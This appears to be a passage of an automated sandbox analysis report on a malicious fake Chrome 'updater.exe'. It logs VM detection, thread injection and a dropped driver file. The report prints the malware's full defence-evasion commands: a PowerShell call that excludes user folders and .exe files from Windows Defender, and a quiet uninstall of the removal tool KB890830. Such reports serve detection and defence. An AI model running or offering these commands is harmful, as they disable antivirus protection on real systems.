          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9896Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9942
          Source: C:\ProgramData\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\zlvyxohjpfnw.sysJump to dropped file
          Source: C:\Users\user\Desktop\updater.exeAPI coverage: 7.2 %
          Source: C:\ProgramData\Google\Chrome\updater.exeAPI coverage: 7.2 %
          Source: C:\Windows\System32\conhost.exeAPI coverage: 1.2 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4344Thread sleep count: 9896 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608Thread sleep count: 9942 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7012Thread sleep count: 44 > 30
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: svchost.exe, 0000003E.00000002.346493278590.00000254DD665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000003E.00000002.346493421715.00000254DD671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
          Source: svchost.exe, 0000003E.00000002.346493205064.00000254DD613000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@bg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\updater.exeCode function: 0_2_00007FF6568E118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF6568E118B
          Source: C:\Users\user\Desktop\updater.exeCode function: 0_2_00007FF6568E11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF6568E11D8
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 36_2_00007FF758EE118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,36_2_00007FF758EE118B
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 36_2_00007FF758EE11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,36_2_00007FF758EE11D8
          Source: C:\Windows\System32\conhost.exeCode function: 60_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,60_2_0000000140001160

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 2404Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 6248Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
